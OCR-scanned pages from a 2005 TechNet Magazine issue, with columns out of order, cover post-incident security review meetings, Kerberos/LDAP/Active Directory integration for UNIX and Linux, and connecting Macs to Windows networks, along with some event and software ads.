of Service (DoS) attacks, the monitoring 
centers of ISPs noticed an upswing in out- 
ages due to sudden bandwidth saturation. 


Most were due to one or two types of DoS | 


attacks. Once this was recognized, all 
operators were trained to look for a DoS 


They'll even circumvent it without consid- 
ering the possible consequences. 

Once the security incident was recog- 
nized, how much time elapsed before it was 
resolved? This is a simple question, but it 
may have a very complex answer. Depend- 
ing on the type of incident (virus infesta- 
tion, e-mailed Trojan, DoS attack, insider 
exploitation) and how widely its impact was 


Winter 2005 


51 


MN 
o- 
= 
me) 
(a 

¢ 
Ao) 

me) 

” 

p>) 

9g 
2 
Q 
iS 
® 
1s 
(2) 
2 
o 
Fe) 
Oo. 


52 


P 


Could the problem have been 
identified faster? 


s 


Could you have realized it was a 
security incident sooner? 


® Could you have stopped the 
problem earlier? 


® What would have helped speed 
up any of these processes? 


® Are you lacking a run book? A 
process? A tool? The right skill 
set? The right people on-call? 


® Do you have sufficient resources 
to handle these attacks? Do you 
have enough people to look at 
the system logs, the firewall logs, 
and Intrusion Detection System 
(IDS) reports? 

« Are you using software to ana- 
lyze these logs and pull out rel- 
evant data to minimize the 
mind-crushing boredom of go- 
ing through each by hand? 


felt across the company, clean up could take 
hours or days. In fact, clean up may still be 
happening while youre having your meet- 
ing. You need to decide what marks the end 
of your incident. Otherwise, events that are 
holding you up, like waiting fora patch from 
a vendor, will continue to show up in the 
documentation of the incident. To avoid 
this, make sure you close this high-priority 
ticket and open a separate ticket at a lower 
priority to track any long-term events. 


Response 


Fora software exploit, you should exam- | 


ine your company’s patch process and pos- 
sibly your firewall configuration. For a viral 
or Trojan-based infection, you should scru- 
tinize your antivirus software as well as its 
update schedule on individual computers. 
You may also want to assess whether vi- 
ruses and Trojans are filtered at the mail 
server and if so, how it’s done. 

Each kind of incident may have a best 
response, but what is best can vary based 
on the company’s network architecture and 
information technology design. Consider 
what might be needed to improve the pre- 
vention, detection, and response processes. 
The first answers that come to mind to solve 


TechNet Magazine 


' these problems are more personnel, more 


education, and better tools. 

Did any one person coordinate your 
company’s response to this incident? If you 
don't have an incident coordinator, consider 
training several employees to handle this 
job. Designating a single point of contact 
for updates is very helpful. For instance, the 
coordinator can collect data from the vari- 
ous people working on the problem and 
report it to upper management. This means 
staff members only have to report to one 
person, instead of dozens calling them to 
ask for a status. One person can maintain a 
timeline and update the trouble ticket, 
keeping a consistent voice in customer and/ 
or company communication. If you do have 


_ anincident coordinator, work with this per- 


son to train others. One person cannot be 
on call constantly to handle any incident 
that might occur. 


Were You Targeted? 


Was your company targeted specifically 
or was this a random attack? The answer 
could be crucial for future prevention, but 
difficult to determine. If the attack was tar- 
geted, it could be because of your company’s 
politics or affiliations. In the current cli- 
mate, companies supporting Genetically 
Modified Organisms (GMO) or the World 
Trade Organization (WTO) are common 
targets. Anyone seen as supporting spam 
may also become targets. High-profile part- 
nerships with controversial organizations 
can often bring negative attention. For in- 
stance, the Electronic Disturbance Theater, 
which created the Floodnet program, was 


active through 2003 publicizing various | 


causes by using Floodnet to overwhelm 
high-profile Web sites. Mexican govern- 
ment Web sites were targeted in support of 
labor and indigenous rights in Mexico, and 
biotech-related Web sites were attacked to 
protest GMO foods. But many attacks are 
never publicized. 

Your company may also have been tar- 
geted due toa particular individual—many 
DoS attacks occur when one person gets 
angry while chatting with another over 
Internet Relay Chat. He may sign up the 
target of his ire for a barrage of e-mail lists, 
give his e-mail address to spammers, or 
launch a DoS attack against his IP address, 


which also happens to be one of your 
company’s IP addresses. Some employees 
run whole IRC servers on their company’s 
networks, which will incur many attacks. 
Most ISPs and many companies can tell war 
stories about any of these types of attack, 
although very few accounts are actually 
published. Data privately gathered from chat 
channels shows that these trends persist de- 
spite changes in technology and politics. 

Lookat the target of the attack and study 
the possible reasons that it was chosen. Was 
it your Web page? If so, it’s likely the attack 
was directed at your company specifically. 
Run some searches and look for calls to ac- 
tion against your company. Consider any 
public announcements your company has 
made recently. 

Was the target your e-mail server? If so, 
is it possible that your marketing depart- 
ment sent out a large number of unsolic- 
ited e-mails, particularly ones that might 
be considered spam? Often if a company 
doesn't provide double opt-in (usually us- 
ing a confirmation e-mail to make sure that 
the owner of the e-mail address really wants 
to be on your mailing list), it can find itself 
the target of much anger. If you havent sent 
out e-mail for a long time, people may 
have forgotten that they provided their e- 
mail addresses to your company. Or 
perhaps your mail server was exploited to 
relay spam, framing your company for the 
deed. Spam, actual or perceived, makes 
people cranky. 

Was the target an individual user's IP ad- 
dress? Talk to that user about what he or 
she was doing at the time the attack com- 
menced. If necessary, mirror the hard drive 
of the machine and perform a forensic 
analysis if it wasn't already done during the 
incident handling process. 

Hopefully, if a particular machine en- 
couraged the attack, was targeted by the at- 
tack, or started the viral or worm infection, 
then that machine has already been taken 
offline and had its hard drive mirrored and 
examined. If this happens so often that you 
don’t have time to look at all of these prob- 
lem machines, then you've gota larger issue 
on your hands. 

If the target was a particular machine, 
look closely at the logs, checking to see 
whether there were any messages left in 


them. Sometimes attackers design their at- 


tacks so that their angry comments appear 


in the log files. 


Was it a random e-mail that started an — 
infection in your company? Chances are 
that this is a nonspecific attack, although if 
its the type of Trojan that grabs files off | 


user’s computers and e-mails them toa spe- 


company. Do you have a copy of the Trojan 
or virus? If so, either have someone on staff 
lookat the code of the malware or run some 


could be when they choose to ignore or 
circumvent security. 


Closing the Meeting 


At the heart of all these issues is one 
important question: do you have an incident 
response process that works? 


searches online and read through any docu- 
mentation of the malware’s innards com- 
piled by a reputable security team. When a 
piece of malware spreads across the Inter- 
net and achieves a certain amount of noto- 
riety, it's commonplace that a number of 
individuals and teams will go over the code 
line by line and annotate it or write a gen- 
eral report about what nefarious goals the 
malware is trying to accomplish. 


More Discussion Topics 

What was the impact of this incident on 
the company? If there was no actual dam- 
age but the company either disconnected 
itself from the Internet or was forcibly de- 
nied service to the Internet, the only real 
damage might be to the company’s reputa- 
tion. But a loss of trust on the part of cus- 
tomers or investors can very easily translate 
to loss of business. 

In some intrusions files weren't deleted, 
but the attacker might have made copies. 
When files are deleted, you may be able to 
recover them either from the hard drive or 
backup media. When files have been cop- 
ied, there’s the possibility that intellectual 


property has been stolen, which is difficult 


to detect. 

Its always important that your employ- 
ees have a thorough understanding of why 
security should be crucial to each of them 


and what the impact to the whole company | 


www.technetmagazine.com 


summarized updates on a regular basis, es- 


| pecially for upper management, but don’t 
| overwhelm your constituency with super- 


fluous e-mail. 


essary companywide changes, like a gen- 


eral changing of passwords, which is | 
. especially important if the attacker man- — 
aged to get onto your networks and watch | 
your traffic go by. Even if some of your ques- _ 


tions remain unanswered, end the meeting 


| promptly. Youand your team will have more 
_ than enough work going through the data _ 
youve gathered in the meeting and work- | 


ing on creating or improving incident re- 
sponse processes. 


Follow Up 


mations or input from various groups, try 


to limit follow-up to e-mail or personal calls 
to each group. Your main concern should | 
be to address gaps in the various processes, | 
- to outline problems (like a lack of tools ora _ 
communication failure), and to document | 
any other issues that slow or impede inci- | 
dent response. When reporting your find- | 
ings, focus on identifying areas for - 
_ improvement, not on placing blame. 
Follow up by educating employees, es- 


| pecially the incident coordinators. Having 
' a group of people who know all the pro- 
' cesses and who can guide the various parts 
_ of the company to cooperate in response to 

The meeting may not come to any sort 
of natural close, especially if discussions _ 
become heated, so make a list of action | 
items. Assign items to the people from — 
cific address, it is possible that a competitor | 
hoped to get sensitive documents from your 


an issue is important. Work with incident 
coordinators to fix processes or create new 
ones. They may also be able to help educate 


| the rest of the company on these processes. 
whom you need information (such as e- | 
mail timestamps and log files). Follow up 

with individuals and continue the summary | 
and discussion via e-mail or other group-_ 


. The Big Picture 


viewable software. Be willing to provide © 


You definitely want everyone in the organi- 
zation to understand at least where to re- 
porta suspected problem or concern. 


At the heart of all these issues is one im- 


: portant question: do you have an incident 


response process that works? The answer is 


| probably yes, although you might not be- 
- lieve it at first. An incident response pro- 
' cess can be anything from the phone 


number of your ISP written on a white- 
board (because you can’t access their Web 
page if your connection is down) to acom- 


_ plex set of steps to follow in an emergency. 
In closing the meeting, schedule any nec- 


Instead of fighting to overlay a whole new 
process onto a set of people who are prob- 
ably already working too hard, integrate in- 
cident recognition and response handling 
into the daily work procedure. Going back 
to the example of ISPs finding DoS attacks, 
notice that their responses to such events 
were worked into the normal processes of 
the operators. 

If you've never had a security incident, 
but you want to apply the lessons of this 


"article, consider having a drill. Invent a fic- 
_ tional security event. Keep it as simple as 
' possible and see how the processes work. 

If there are questions or issues whose | 
resolution need active participation from | 
multiple groups, you will have to call an- | 
other meeting. But if you just need confir- 


You can even conduct a post mortem on 
the drill. It may be difficult to get people to 
take you seriously, but it helps if you have 
the support of management. 


Conclusion 

Turn your security incident from a pos- 
sible disaster into a galvanizing event. Let it 
energize your company and encourage it to 
improve its incident response processes. It 
can show your company where the flaws 
are, not so blame can be apportioned, but 
instead to allow problems to be fixed. And 
when youre finished, you'll be prepared for 
next time. And there will beanext time. © 


Winter 2005 53 


Microsoft and Windows IT Pro 
bring you the premier events for IT professionals. 


retest 


1S 3b 


BR Bb 
ee 


_ A unique opportunity to get your cutting edge technology & training 
directly from the source: Microsoft® architects and world-renowned gurus. 
MICROSOFT 


| EXCH ANGE WINDOWS 


Connections C5 Connections 
7 2Q05 2@05 


October 30-November 2, 2005 
ee Co-located in 
San Diego, California 
Manchester Grand Hyatt San Diego 


~ TONY STEVE RILEY MARK MINASI MARK 
MR&D 


REDMOND - MICROSOFT RUSSINOVICH 
» “HEWLETT WINTERNALS 


PACKARD 


800.505.1201 - 203.268.3204 


AT A GLANCE 


¢ Overview of Kerberos 4 and 5 


¢ Transitioning from X.500 to 
LDAP 


¢ The LDAP model 


¢ Vintela Authentication 
Services for UNIX and Linux 


Peter Larsen is a software development engineer at 
Microsoft. Before joining Microsoft, Peter was involved 
in architecture and development of telecom operational 
software systems and standardization and development 
of wireless services. 

Jason Zions is an architect at Microsoft, Previously he 
was the chief scientist for Softway Systems, where he 
led the development of Interix, which later became a 
part of Microsoft Services For UNIX. Jason has also 
been heavily involved in POSIX standardization. 


This article is adapted from Microsoft Solution Guide 
for Windows Security and Directory Services for UNIX, 
available on the TechNet Web site. 


56 TechNet Magazine 


cols of choice. 


Directory Services and 
Identity Management 


Peter Larsen and Jason Zions 


Cross-Platform Security 


= Mixing It Up: 
Windows, 
UNIX, And 


Active Directory 


As the world becomes more and more connected, a problem 
has emerged. How do organizations and partners store sensitive 
data in heterogeneous environments, and how do they verify 
the identity of users requesting the information on any platform? 


Both end users and organizations look for _ 
three elementsin their security solutions: con- | 
fidentiality, integrity, and availability, When a _ 
user is authenticated, the process can employ 
any number of methods from passwords (in- 
formational) to smartcards (object-based) to 
biometrics, or ideally, some combination of | 
these techniques. When you are supporting » 
a site that employs a mixture of Windows’, — 
UNIX, and Linux servers, you can supportall 
of these elements and methods by > 
choosing Kerberos and LDAP as your proto- 


management, which covers information re- 
lating to individuals. Identity management 
includes the management of computer user 
accounts, the contact details of those user 
accounts, door entry system user accounts, 
application user accounts, e-mail system 
user addresses and accounts, and more. 
Identity management solves the prob- 
lems of maintaining this information. In- 
formation on individuals is stored in one 
place and administered in a consistent man- 
ner. The LDAP standard discussed later de- 


_ fines a directory service that can be used as 
_ the basis for identity management solutions. 


_ Overview of Kerberos 4 
Active Directory’ in Windows Server™ — 
2003 provides a foundation for identity 


The Kerberos protocol is a standard de- 
signed to provide strong authentication 


within a client/server network environ- 
ment. Kerberos network messages are en- 
crypted and decrypted using algorithms 
that translate the Kerberos data into a form 
that is very difficult to decode into its origi- 
nal form. A secret encryption key is used to 
encryptand decrypt the data. Kerberos also 
uses mathematical techniques called hashes 
to ensure the integrity of any data that is 
not encrypted. 

Kerberos 4 contains a number of terms 
and ideas that are important to know. 
Principals All entities within Kerberos, in- 
cluding users, computers, and services, are 
known as principals. Principal names are 
unique; a hierarchical naming structure en- 
sures their uniqueness. 

Realms The principal is a member of a 
realm. By convention, a realm name is the 
DNS name converted to uppercase, so that 


EXAMPLE.COM realm. Although upper- 
case realms are not obligatory, using a dif- 
ferent case simplifies differentiating 
between domain names and realms. 
Ticket A ticket is the fundamental unit of 
Kerberos authentication. It is a carefully 
constructed message containing the au- 
thentication information which is passed 
between computers. 
Key Distribution Center The Key Distri- 
bution Center (KDC) is made up of three 
components: a database of principals con- 
taining users, computers, and services; an 
authentication server that issues Ticket Grant- 
ing Tickets (TGT); and a Ticket Granting 
Service (TGS) that issues service tickets 
granting clients access to specific services. 

Each realm requires at least one KDC to 
operate. Kerberos authentication relies on 
the use of tickets passed between the client, 
the KDC, and the required server to con- 
firm authentication and authorization. 

Figure 1 shows the exchanges that take 
place during authentication using the 
Kerberos protocol. 

Initially, a client contacts the authentica- 
tion server component of the KDC, send- 
ing a request that contains the principal 


name,a timestamp, the lifetime of the ticket 


requested by the client, and the name of 
the TGS. 

In response, the authentication server 
generates a session key, and makes two cop- 


www.technetmagazine.com 


ies of it: one for the client, the other for the | 
TGS. The authentication server sends a | 
TGT back to the client; this TGT containsa _ 
copy of the session key, the identity of the | 


client, a timestamp, details of the IP ad- 
dress of the client, and of the ticket lifetime. 
When returning the TGT to the client, 


whole response to the client is encrypted 
using the client key. 
The client receives the information in this 


well as a TGT that is still encrypted by the 
key of the TGS. 
The client now forwards the TGT to the 


_ ticket-granting server, along with a request | 
the example.com domain becomes the — 


for the service to be accessed and a time- 
stamp encrypted with the session key ob- 
tained from the authentication server. This 
timestamp serves to prevent replay attacks, 


which occur when a request for a service 
' from the client is captured by a hacker and | 
resent at a later date. The TGS processes 


this request and responds with a new set of 


session keys, the principal name of the ser- 
vice requested, the lifetime of the ticket, and 
a service ticket encrypted with the service key. 

The service ticket is similar to the TGT 
and contains a new session key, the prin- 
ciple name of the client, the ticket lifetime, 


_ atimestamp, and the client's IP address. All 
the authentication server also returnsacopy — 
of the session key, the principal name of the — 
TGS, and the lifetime of the ticket. This — 


of this is then encrypted with the key of the 
client and sent. 

The final stage of the authentication pro- 
cedure differs depending on the service and 
server being requested. This is because each 


_ application defines its own methods for the 
encrypted reply, and is able to decrypt it | 
because it was encrypted with the client's — 
key. This gives the client its session key, as 


exchange of the service ticket. 

An example of a service is the Network 
File System (NFS). NFS allows for a host to 
access (“mount”) directories that are held 
ona remote server. This access can be con- 
trolled by Kerberos. 

Kerberos 5 is an extension of Kerberos 4. 
It contains all of the functionality of the 
earlier version, plus many enhancements. 
These include support for credential for- 
warding, multiple encryption types, renew- 
able tickets, and preauthentication. 
Kerberos 5 is the default method of net- 
work authentication for services and appli- 
cations in Windows Server 2003. 


Client 


Authentication 
Server Request 


Authentication Server 


Client Principal 
Glient Timestamp 


Requested Lifetime 


Name of TGS 


Authentication 
Server Reply 


User's Copy 
of Session Key 


Name of TGS 
Ticket Lifetime 


TGS Copy 
of Session Key 


Client Principal : 


Figure 1 Authentication with Kerberos 


Winter 2005 57 


A large number of distributions of the 
Kerberos protocol are available, both com- 
mercial and open source. Most major UNIX 


distributions contain an implementation of — 


Kerberos as part of a standard installation. 
There are two open source Kerberos 5 dis- 
tributions, MIT and Heimdal; information 
about the Heimdal version is available at 
www.pdc.kth.se/heimdal. 

MIT Kerberos is simple to compile across 


all platforms and works well with all other — 


implementations. While precompiled ver- 
sions are available for download from other 
sources, it is recommended that you down- 
load and verify the integrity of the source 
yourself to ensure the best security. MIT 
Kerberos is available for download from 
web.mit.edu/kerberos/www. 

Some countries have restrictions on the 
use of cryptography, so confirm that Kerber- 
os is acceptable under your country’s laws 
before implementing a Kerberos solution. 


The LDAP standard is used for authenti- 
cation and directory services, and has also 


58 TechNet Magazine 


At www.ietf.ore/ric.htm 


evolved into a simple method of accessing 


X.500. The X.500 standard is designed to 


have one worldwide distributed directory 
with a standard access interface. It is ex- 
tremely complex, as are the Open System 
Interconnection (OSI) network protocols 
over which it was designed to operate. In 
| fact, OSI network protocols are far more 
complex than the more commonly used 
TCP/IP suite. 

LDAPv3 is widely implemented as a part 
of operating systems, network operating 
systems, directory services, applications 
such as e-mail servers, and client applica- 
tions. LDAPv3 is a core component of 
Windows Server 2003 Active Directory. The 
implementation of LDAPv3 found in 
Active Directory is fully integrated with a 
| standards-compliant security system based 

on Kerberos and Microsoft’ Windows. 


tocol, LDAP defines the operations used to 
communicate with a directory service, how 


to refer to an entity in the directory, how to 
describe the attributes of an entity and, fi- 
nally, the security features that can be used 
to authenticate to the directory and control 
access to the entities within the directory. 
LDAP is characterized by the following: 
The protocolis carried directly over TCP 
for connection-oriented transport (re- 
ceipt of data is acknowledged) and User 
Datagram Protocol (UDP) for connec- 
tionless transport (no acknowledgment 
upon sending or receiving data). 
Most protocol data elements, such as 
distinguished names, can be encoded 
as ordinary strings. 
Referrals to other servers can be re- 
turned to the client. 
Simple Authentication and Security 
Layer (SASL) mechanisms can be used 
with LDAP in order to provide associ- 
ated security services. 
Attribute values and distinguished 
names can be internationalized 
through the use of the International 
Organization for Standardization 
(ISO) 10646 character set. 
The protocol can be extended to sup- 
port new operations, and controls can 
be used to extend existing operations. 
The schema is then published through 
an attribute on the root object for use 
by the clients. 
The component models defined in LDAP 
are the same as those defined in X.500, and 
are explained in the following sections. 


The attributes and characteristics asso- 
ciated with an entry are defined in the 
entry's object classes. The definition of ob- 
ject classes and attributes, in turn, is held in 
the schema. The following are the three 
types of object class definitions that are used 
in LDAP directory servers: 

Structural object class A structural object 
class represents a real-world object, such as 
a person. An entity must belong to one and 
only one structural object class. 

Auxiliary object class An auxiliary object 
class is used to extend a structural object 
class. It has no meaning on its own. 
Abstract object class The abstract object 
class is used only when it is an ancestor of a 
derived class. 


The Naming Model 


The naming model defines how each en- 
try can be referenced. In an LDAP direc- 
tory, entries are organized in a hierarchical 
tree called a Directory Information Tree 
(DIT). Each node in the tree is an entry 
that can store information, and also serve 
as a container for other entries. An entry in 


the tree can be referenced by using either its 


relative distinguished name (RDN) or its 
distinguished name (DN). An RDN is 


unique only within a particular directory; | 


a DN is globally unique. 


An RDN for an attribute might be the 
common name (cn) of an object, as you | 


_ The Security Model 


The security model provides methods for 


can see in this attribute: 


cn="Michael Allen" 


An RDN could also be made up of more | 


than one attribute value when uniqueness 
cannot be ensured by simply using a single 
attribute. For example: 

cn="Michael Allen"+ou="Engineering" 

The plus (+) symbol in this example 


makes it clear that the RDN is multi-val- 
ued. The practicality of multi-valued RDNs 


is clear when your organization has two | 
employees named Michael Allen. If they are — 


in two different departments, they can have 
RDNs which are uniquely qualified by de- 
partment, as defined in the example by the 
organization unit (ou) attribute. The DN 
for Michael Allen’s entry might be: 


cn="Michael Allen",dc="example”,dc="com" 


In this case, the object is uniquely de- 
fined in the local directory as well as glo- 
bally. The domain component (dc) attribute 
values are used to uniquely define the DNS 
domain name of the directory server. 

In LDAP, the naming context for a direc- 
tory can be defined in either a geographical 
or a domain name format. The geographi- 
cal format was the primary method of lo- 
cating a directory in X.500, and is still used 
with LDAP servers. However, it is common 
to use the domain name of an LDAP server 
as its naming context because domain 
names are globally unique on the Internet. 

In Figure 2, the naming context of the 
directory server is the domain name exam- 
ple.com, or the DN dc=example, dc=com. 
The DN uses ou=“Users” instead of 
cn=“Users”. In this case cn and ou are in- 
terchangeable because the common name 


www.technetmagazine.com 


of an organizational unit is identical to the 
name of the organizational unit. 


The Functional Model 


The functional model is the method by | 
which a directory client can communicate 


with the directory; this role is filled by the 


LDAP protocol itself. LDAP provides the © 


following operations: 
Interrogation: searching the directory 
Modification: updating, adding, or de- 
leting entries in the directory 
Authentication and control: authenti- 
cating to the directory (also known as 
the bind operation) 


authenticating against the directory and for 
authorizing client access control to the di- 
rectory. There are two components to the 


security model: authentication using LDAP | 


binds and the control of any access to ob- 
jects in the directory. 


We'll cover the details of authentication | 


to LDAP alittle later in the article, but once 
the client is authenticated, it can use the 
LDAP directory only as defined by the 


directory’s Access Control Lists (ACLs). 


The use of ACLs in an LDAP directory is 
implementation-dependent. 


_ The LDAP Interchange Format 


LDAP directories can exchange data and 
schema definitions using a standard nota- 


tion called the LDAP Interchange Format 
' (LDIF). LDIF has a simple text file format 
that consists of the following: 
Entries separated by blank lines repre- 
senting a single entity 
Comments beginning with the pound 
character (#) 
Assignments of values to attributes 
Directives that instruct the LDIF parser 
on how to interpret the entries 
An LDIF file showing the definition of a 
person entity is shown in the following ex- 
_ ample. This LDIF file could be used to cre- 
_ ate the entity in an LDAP directory: 


# This is a comment 

dn: cn=Michael Allen,cn=Users,dc=example,dc=com 
objectClass: person 

cn: Michael Allen 

sn: Reid 

telephoneNumber: 555-0100 


The last line is a blank line. This file defines 

' anentity with the DN: 
cn=Michael Allen,cn=Users,dc=example,dc=com 

The entry is a member of object class per- 
son, which contains attributes such as the 
common name (cn) of a person, a person’s 
surname (sn), and a person's telephone 
number (telephoneNumber). 


Using LDAP for Network 


Authentication 

LDAP authentication involves an entity 
binding to the LDAP server. The success of 
the bind operation is determined by the ac- 
ceptance or rejection of the entity's creden- 
tials. If the bind is successful, the entity is 


ou=sites 


cn= 
Michael 
Allen 


DN = Distinguished Name 


DN: dc=example, 
dc=com 


DN: ou=Users, dc=example, 
dc=com 


RDN 


DN: cn=Michael Allen, 
ou=Users, 
dc=example, 
dc=com 


RDN = Relative Distinguished Name 


Figure 2 Naming 


Winter 2005 59 


Windows Users 
¢ Account Info 

¢ Privileges 

e Profiles 

« Policy 


Other NOS 

¢ User Registry 
* Security 

« Policy 


Other Directories 


* White Pages 
« E-commerce 


E-mail Servers 
* Mailbox Info 
« Address Book 


Windows Clients 


e Management Profile 
¢ Network Info 
« Policy 


Active 
Directory 


Applications 

« Server Config 

« Single Sign-on 

« App-specific 
Directory Info 

« Policy 


Windows Servers 


¢ Services 

e Printers 

¢ File Shares 
« Policy 


Network Devices 


* Configuration 
+ OoS Policy 
* Security Policy 


Firewall Services 


* Configuration 
* Security Policy 
» VPN Policy 


Internet 


Figure 3 Active Directory 


authenticated; if it is unsuccessful, the en- 
tity is not authenticated. 


In order for LDAP to be used for UNIX | 


and Linux login or service authentication, 
it needs to be coupled with the LDAP Plug- 
gable Authentication Module (PAM). 
Unlike Kerberos, which is designed as an 
authentication mechanism, LDAP authen- 


tication is designed specifically for secur- 


ing directory transactions. Using LDAP 
authentication for purposes other than 
LDAP directory access can lead to perfor- 
mance problems. This is because LDAP di- 
rectory services are not designed to handle 
large numbers of authentication requests, 


but are instead tuned to perform well when 


handling directory transactions. 


Microsoft Active Directory 


Active Directory is an essential and in- 
separable part of the network architecture 


the Windows NT” 4.0 operating system to 


provide a directory service designed for dis- 


tributed networking environments. Intro- 


is an integral part of Windows Server 2003. 
Active Directory is built around the 


60 TechNet Magazine 


such, is compatible with Kerberos 5 clients 
and LDAPv3 clients across all platforms. 
This allows Windows Active Directory serv- 
_ ers to provide security and directory ser- 
vices ina heterogeneous network. 


Combined, these technologies enable or- 


' ganizations to apply standardized business 
' rules to distributed applications and net- 
work resources without requiring admin- 
_ istrators to maintain a variety of specialized 
| directories. An overview of Active Direc- 
| tory is shown in Figure 3. 


_Vintela Authentication 
_ Services 
As with Active Directory, UNIX and | 
' Linux systems typically include their own | 
_ implementations of both Kerberos and — 
_ LDAP. Although these implementations 
_ can interoperate with Active Directory, they 
_ are typically done without considering the | 
that improves on the domain architecture of 
_ standards in Active Directory. 
 Vintela Authentication Services (VAS) | 
' implements Kerberos and LDAP function- 
duced in Windows 2000, Active Directory | 


way that Microsoft has integrated the two 


ality on UNIX and Linux systems, and can 


- fully integrate with Active Directory. The 
_ benefits of using VAS include the following: 
Kerberos 5 and LDAPv3 protocols and, as 


You have the ability to manage UNIX 


and Linux users and computers are 
managed through the Active Directory 
Users and Computers Microsoft Man- 
agement Console (MMC) snap-in. 
Kerberos is the protocol used to secure 
LDAP traffic. 

Performance is tuned to work effec- 
tively with Active Directory. 

The VAS product allows UNIX and 


' Linux clients to operate within an Active 


Directory domain in a manner equivalent 


' to Windows clients. 


: Summary 


In this article, we’ve discussed the basic 
technologies necessary to achieve single 
sign-on between networked computers 
with a variety of operating systems. The de- 
tailed instructions on how to configure 
single sign-on between, say, Linux and Win- 
dows is detailed in the online guide listed 


| in the references. The guide describes two 


methods of achieving single sign-on, one 
using open source code and the other us- 


_ ing the commercially available Vintela 
_ product. With these new technologies in 


hand, you'll finally be able to deliver on the 
promise of information access any time, on 


' any device and on any platform. @ 


ie 


/ 


Looks like your boss wants to 
offer his “congratulations.” 


The application you deployed 
just crashed 8,500 desktops, 
setting a new company record. 


> 
©_ 
= 
—_ 

YN 
_ 
Cc 
o- 
O. 


Next time prepare your software 
package with AdminStudio 
before you deploy. 


Wee eee ee ee ee oe 


VAS 


\ ‘ 
\ 4 


AdminStudio provides systems administrators and software 


packaging teams with the fastest and easiest solution for 


preparing reliable applications and patches for enterprise installshie|d-comyiednd 


use. Don't deploy software without it. Preparing reliable applications for 
deployment has never been easier. 
é Try AdminStudio Today! 
Micresoft 


CERTIFIED 
Partner 


- ma@ro 


n Corporation. All Rights Reserved. ‘ : é 3 InstallShield, a M 


-2004 Macrovision Europe Ltd. and/or 


wn 
® 
i 
= 
© 
2) 


for 
Macintosh 


ATAGLANCE | 


Cross-Platform Security 


Jay Shaw 


Yes, You Can! 
Secure Your Mac 
ap On A Windows 


¢ Connecting a Mac to your 
Windows-based network 

¢ Configuration of different 
Mac OS versions 

© Security considerations and 


network services 


Jay Shaw is an independent network consultant. His 
company, Network Consulting Services, is located on 
Long Island in New York. He can be reached at 
info@ncservices.net. 


62 TechNet Magazine 


network? How will users access file shares, print, browse the Internet, and use — 
e-mail? What do you do? You don’t know anything about a Mac beyond | 
plugging it into the wall. In a perfect world, you could plug in any device and 
go to work. Unfortunately, it’s a little more involved than that. It isnt as hard as — 
it sounds, though, nor is it as difficult as it used to be. Just remember that there — 
is more than one way to peel an Apple! 

First, you need to determine which Mac OS youre working with. If you need | 
to support only the Classic Mac OS (OS 9.x _ 
or older), your choices are simple, but lim- 
ited. Obtaining support for the platform will _ 
become increasingly more difficult as time — 
progresses. Supporting Mac OS X is more | 
complicated, but you also have many more | 
options at your disposal. You might need to 
support both versions of the OS. You can — 
provide file and printer sharing on either © 
platform. More advanced functionality like 
integration with Active Directory’ is only | 


Network 


If you work in network support for Windows, sooner or later it’s 
bound to happen. You'll be sitting quietly at your desk, and someone 
will walk up with a long list of questions about their Apple 
Macintosh computer. How do we connect it to the existing 


available in an OS X environment, and re- 
quires a little more planning. 


Services for Macintosh 
If you only need to support the Classic 


’ Mac OS or need both Classic and OS X, the 


best approach is to install Services for 
Macintosh (SFM) on your server running 
Windows’. Once it is loaded, the server can 
designate directories as Mac-accessible vol- 
umes. These volumes can be seen from ma- 
chines running either the Classic Mac OS 
or OS X, and can even be shared with Win- 
dows-based clients at the same time. The 
server running Windows stores the Mac 
files on NTFS volumes and ensures that 
NTFS file names are properly supported. 
SFM also allows for support of the Clas- 


sic Mac file format. Classic Macs store files 
in two pieces called forks: a data fork anda 
resource fork. As the name implies, the data 
fork contains data. For executables, this is 
where the program's instructions are stored. 
The resource fork contains the file’s re- 
sources, which can include items like icons, 
sounds, font, and images. SFM permits the 
server running Windows to store both forks 
ina single file. 

Once you have loaded SFM and config- 
ured file permissions, you can connect to 
your server from a Mac, but note that file 
permissions for the Mac and the PC are 
configured separately. You will be required 
to authenticate using your domain user 
name and password for resources. While 
this is important functionality, it only pro- 
vides basic file sharing. It also only allows 
you to serve files in one direction: Win- 
dows-based server to Mac. 


In the past, it was necessary to load the » 


AppleTalk protocol to support Macintosh 
clients, but Windows now supports Apple 
File Protocol (AFP) over TCP/IP. This 
means that your Mac volumes are available 
to your clients through TCP/IP. The Apple- 
Talk protocol is no longer needed in many 
cases. Even Apple has moved on and no 
longer promotes its use. However, keep in 


mind that if you want to eliminate Apple- — 


Talk, you will need the DNS name or the IP 
address of the server you want to connect 
to. You cannot browse for Apple resources 
without AppleTalk. 

If you want to continue to use the Apple- 
Talk protocol, the Windows-based server 
can act as an AppleTalk router. It also has 
the ability to seed or define your AppleTalk 
network exactly as if it was a native Mac- 
intosh server. 

Apple provides a client or User Authenti- 
cation Module (UAM) right out of the box 
in both the Classic and OS X environments 
for connection to SFM, but it’s not a very 
secure solution. It only supports eight-char- 
acter passwords. This invariably causes 
problems when users with longer passwords 
attempt to access a resource. UAM also does 
little to hide these passwords as they travel 
over your network, for little or no encryp- 
tion is applied. Because of these shortcom- 
ings, it’s important to use the Microsoft 
UAM instead. The UAM supports 14-char- 


www.technetmagazine.com 


OO Ossian 


Server Address: 
smb://servername/sharename 


Favorite Servers: 


Remove 


Connect To Server 


io e 


(| Browse) € Connect) 


Figure 1 Mac Server and Share Authentication Dialog Box 


acter passwords and uses stronger encryp- 
tion. SFM and UAM are available as free 
downloads from the Microsoft Web site at 
www.microsoft.com/mac/otherproducts/other- 
products.aspx?pid=windows2000sfm. 

While this solution does provide a good 
deal of functionality, there are still a num- 


| ber of limitations. For example, Classic 


Macs are often configured without a cen- 
tralized login—you log in to each resource 
separately. You only have access to folders 
configured as Mac volumes on Classic 
Macs. Browsing for resources is very lim- 
ited. Shares must be configured twice if you 
need access to the same files from the PC 
and the Mac, and security is not very ro- 
bust. There is also no support for Distrib- 
uted File Shares (DFS), file shares that are 


along with any other print jobs that were 
sent from computers running Windows. 
While this does work, it’s not always the 
best solution. There are often problems 
when the print jobs are converted. Print- 
outs are not always accurate, and sometimes 
dort print at all. Driver problems also 
plague this configuration. 

Ina larger environment, it is often nec- 
essary to manage print jobs in this man- 
ner. When in a smaller environment, 
however, it’s usually best to allow the Mac 
clients to bypass the Windows-based 
server and print directly to the printers. 
Although you lose central control, the jobs 
will print properly most of the time. This 
can be accomplished in a few different 
ways. Many printers have native support 


in the past, it was necessary to load the 
AppleTalk protocol to support Macintosh clients. 


spread across several servers to provide bet- 
ter redundancy. 

Printing is a little more flexible, however. 
